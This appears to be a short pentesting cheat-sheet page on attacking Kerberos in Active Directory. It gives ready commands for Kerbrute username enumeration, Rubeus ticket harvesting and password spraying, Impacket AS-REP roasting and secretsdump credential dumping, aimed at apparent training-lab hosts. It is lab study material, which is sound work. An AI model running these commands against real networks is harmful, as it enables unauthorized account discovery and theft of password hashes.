Kerberos

Kerbrute

Download from https://github.com/ropnop/kerbrute/releases

# Bruteforce Usernames
./kerbrute_linux_386 userenum --dc 10.10.74.225 -d spookysec.local userlist.txt

Rubeus

Download: [https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)

Rubeus.exe harvest /interval:30

# Add domain name to host file
echo 10.10.24.25 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
# Password Spray
Rubeus.exe brute /password:Password1 /noticket

Impacket

GetNPUsers.py

This tool (part of impacket) can be used to ASREPRoast

python3 ./GetNPUsers.py spookysec.local/ -dc-ip 10.10.74.225 -usersfile ~/Downloads/foundusers.txt

Secretsdump.py

python3 secretsdump.py domain\username:password@10.10.250.74

PreviousResources NextNetwork Based

Last updated 2 years ago